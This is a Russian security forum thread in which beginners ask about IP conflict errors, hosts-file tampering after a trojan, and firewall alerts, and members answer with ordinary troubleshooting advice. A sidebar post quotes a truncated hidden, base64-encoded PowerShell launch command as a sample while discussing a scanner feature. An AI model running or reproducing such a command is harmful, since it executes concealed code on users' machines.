Перейти к содержанию
Unknown

ВопросЫ чайников

Recommended Posts

Unknown

У меня, например, есть несколько вопросов по безопасности, ответы на которые скорее всего уместятся в одном или нескольких предложениях. Поэтому наверно удобней и целесообразней было бы воспользоваться формой вопрос-ответ в рамках одной темы, что уменьшит засорение форума.

Вопрос :

Уважаемые форумчане возможно вопросы кому-то покажутся смешными, но помните, что все мы родились чайниками ;)

Возможно такое(при подключению к сети через кабель) что кто-то может частично или полностью использовать мой интернет-трафик?

Может ли кто-то(из таких же пользователей оставаясь незамеченным провайдером) с целью навредить блокировать мне доступ к интернету?

Что значит сообщение: "Подключение ограничено или отсутствует. Может отсутствовать доступ к интернету или к некоторым сетевым ресурсам. Ошибка произошла вследствие того, что компьютеру не был назначен сетевой адрес."

Что значит такое сообщение?

b06pwZdnmG.jpg

Буду благодарен за ответ и помощь

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Groft

Судя по скрину, то ваш ip в это время ставит кто-то другой в сети. (ip, который у вас в сети)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
Что значит такое сообщение?

Это значит, что кто-то присвоил ваш IP себе. Возможно, он также поменял свой MAC-адрес на ваш. В зависимости от организации разграничения доступа к инету, этот "кто-то" может от "имени" вас выюзать весь ваш инет. Есть небольшая вероятность, что это просто переполнения резерва адресов DHCP, и ваш в данный момент "свободный" адрес просто кому-то присвоили, и тот человек совсем не виноват.

Я бы посоветовал использовать Outpost или последний KIS, которые вроде могут предотвращать угон адреса, когда вы в онлайне. Но, если вы часто в оффлайне, то обращайтесь к администратору сети. Да и вообще обратитесь к нему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Я не думаю, что этот вопрос относится к тематике форума. Если я прав - пусть мои опытные коллеги закроют его. Не прав - оставят.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Chaman

Unknown

Вчера и у меня такая же проблема была, дело было в том, что админы нашей сети поставили злостную программу, которая глушила всех у кого IP не совпадал с MAC-адресом (сменил себе материнку). Так что в любом случае обратись к администратору.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Unknown

Спасибо всем кто ответил, но я так и не прочитал ответ на главный по важности для меня вопрос:

Может ли кто-то частично или полностью использовать мой интернет-трафик?

Я бы посоветовал использовать Outpost

это брандмауэр, а он не будет конфликтовать с родным ХРшным и антивирусом avast?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
georgy_n
но я так и не прочитал ответ на главный по важности для меня вопрос

почему же?

этот "кто-то" может от "имени" вас выюзать весь ваш инет
это брандмауэр, а он не будет конфликтовать с родным ХРшным и антивирусом avast?

Естественно, XP-шный firewall надо отключить (Outpost сам позаботится об этом в процессе установки), а о проблемах совместимости Avast и Outpost мне лично слышать не приходилось, должны в паре работать нормально.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Unknown

Спасибо

Вопрос

Результаты проверки компьютера

На Вашем компьютере запущен и работает виртуальный сервер (Internet Information Services или какой-либо другой). Это существенно подвергает Ваш компьютер опасности, т.к. часть Вашего дискового пространства доступно из вне

Что это за сервер? как его найти и отключить или ликвидировать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2600

Отключи его через установка и удаление программ, установка и удаление Windows компонент.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
DWState

Похожая ситуация: сеть обычная рабгруппа на 6 ПК у всех прописаны свои ай-пи. Приходит добрый дядя подключать АДСЛ и после подключения к Инету происходит такая оштбка. Отключаемся все ок. Все прошерстил не нашел таких же ай-пи.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Black Angel

Тоже была похожая ситуация.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
xck

Такая ошибка возникает в том случае, когда в сети появляется машина с таким же адресом, может DHCP выдал Ваш адрес другому клиенту, может кто то забил Ваш IP адрес вручную (Администратор например), возможно какие то ошибки в DNS, причем подмена IP адреса если произошла то это не означает что кто то его подменил умышленно.

П оповоду АДСЛ модема, как правило на таких устройствах по умолчанию DHCP уже включен, возможно диапасоз его адресов совпал с тем который был уже в Вашей сети, на самом деле проблема решается отключением DHCP на АДСЛ модеме и присваивании ему адреса из вашего дмпазона.

Для справки:

DHCP (англ. Dynamic Host Configuration Protocol — протокол динамической конфигурации узла) — это сетевой протокол, позволяющий компьютерам автоматически получать IP-адрес и другие параметры, необходимые для работы в сети TCP/IP

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TANUKI
Я не думаю, что этот вопрос относится к тематике форума. Если я прав - пусть мои опытные коллеги закроют его. Не прав - оставят.

Почему не относится? Ведь это вопрос безопасности.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
amigo_s

Подскажите. У меня стоит несколько браузеров (подбираю какой лучше), на любом из них хочу перейти по адресу http://www.google.ru/ и выскакивает что нельзя перейти и так же по рамблеру. Но после этого я пробую http://www.google.com/webhp?hl=ru все нормально. Никаких проблем в поиске не возникает. А при попытке при переходе на главнюю страницу выбивает ошибку. Перед этим я сканировал компютер и нашел трояна Suslik (Dr.Web CureIt! с новой антивирусной базой).java script:add_smilie(":wub:","smid_14")

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lemmit

amigo_s, а что подсказать-то?

("- Видишь суслика? - Нет. - А он есть..." (С))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TANUKI
Suslik

scuka, lichnost'! :lol:

Прибей суслика и всего делов :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

amigo_s, наверное, хотел сказать, что и после "суслика" нельзя открыть главную страницу Гугла и Рамблера даже в нескольких браузерах, только не указал какие это браузеры.

В IE можно попробовать вернуть настройки "по умолчанию".

Может вам поможет обсуждение из вот этой ветки.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dot_sent

C:\Windows\System32\Drivers\Etc\hosts ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001
C:\Windows\System32\Drivers\Etc\hosts

Если бы там был заблокирован адрес [http://www.google.ru], то адрес [http://www.google.com/webhp?hl=ru] также бы не открывался, а у него открывается.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dot_sent
Если бы там был заблокирован адрес [http://www.google.ru], то адрес [http://www.google.com/webhp?hl=ru] также бы не открывался, а у него открывается.

Даа? А Вы проверьте ;) Я - проверил.

amigo_s

В более развернутой форме - проверьте содержимое файла C:\Windows\System32\Drivers\Etc\hosts. Открыть его можно Блокнотом. Если там есть строки кроме

# © Корпорация Майкрософт (Microsoft Corp.), 1993-1999#...# (тут еще несколько строк, начинающихся с #)#127.0.0.1       localhost

то скопируйте сюда эти "лишние" записи. Если среди них есть строки типа "127.0.0.1 google.ru" ну и аналогично по другим проблемным сайтам - надо эти строки удалить и сохранить файл.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Или скачайте чистый файл hosts из вот этого поста. :)

http://www.anti-malware.ru/forum/index.php...=&pid=46947

надо эти строки удалить и сохранить файл.

А предварительно в свойствах файла снять галочки у атирибутов "Только чтение" и "Скрытый", если стоят. :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Тема открыта Администратором по моей просьбе.

Т.к. найдено абсолютное 100%-решение проблемы из головного поста этой темы.

Сам с этим столкнулся недавно и решил проблему неправильного подключения.

Проблема, на которую указывает скриншот поста #1, связана с техническими настройками подключения.

Надо всего лишь сменить в настройках adsl-подключения "Routing" на "Bridge" (скриншот, к сожалению, не сделал).

Если нет возможности выполнить настройку самостоятельно - обратитесь по телефону в Службу поддержки провайдера и вместе с ними сделайте, как скажут.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Androno

Здравствуйте! Вот у меня точно такая же проблема: выскакивает надпись "конфликт IP дреса с другой системой в сети". Оутпост тоже поддакивает "атака конфликт IP адреса шлюза". Настройки модема по-умолчанию, в компьютере отключил нет-биос трафик, IP выставлено на " получать автоматически". И еще, что интересно, модем несколько уже дней без перерыва показывает какой-то входящий трафик(лампочка на нем мигает,сигнализирующая о приеме данных). В журнале Оутпоста непрерывно фиксируется блокировка входящего трафика с адреса 192.168.1.1-255 окончания разные постоянно. А что самое интересное, так это то, что при отсоединеном Ethernet-кабеле модем продолжает мигать. Стоит подключить кабель к компьютеру, как Оутпост снова начинает сходить с ума

NoNam.jpg

post-5074-1228464065_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dot_sent
Здравствуйте! Вот у меня точно такая же проблема: выскакивает надпись "конфликт IP дреса с другой системой в сети". Оутпост тоже поддакивает "атака конфликт IP адреса шлюза". Настройки модема по-умолчанию, в компьютере отключил нет-биос трафик, IP выставлено на " получать автоматически". И еще, что интересно, модем несколько уже дней без перерыва показывает какой-то входящий трафик(лампочка на нем мигает,сигнализирующая о приеме данных). В журнале Оутпоста непрерывно фиксируется блокировка входящего трафика с адреса 192.168.1.1-255 окончания разные постоянно. А что самое интересное, так это то, что при отсоединеном Ethernet-кабеле модем продолжает мигать. Стоит подключить кабель к компьютеру, как Оутпост снова начинает сходить с ума
netbios-ns 137/tcp NETBIOS Name Service

netbios-ns 137/udp NETBIOS Name Service

Служба имен НетБиос - это не криминал, особо если локальная сеть построена на основе Windows.

Про конфликт IP пока ничего сказать не могу, недостаточно информации. Выложите хотя бы результат выполнения в консоли команды ipconfig /all

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
xck
Оутпоста непрерывно фиксируется блокировка входящего трафика с адреса 192.168.1.1-255

Если у Вас сеть то возможно это просто броадкасты... С других машин? В модеме случаем DHCP не этот диапазон IP раздает? Возможно проблема в модеме? Какой модем? Отключение по таймауту настроено?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×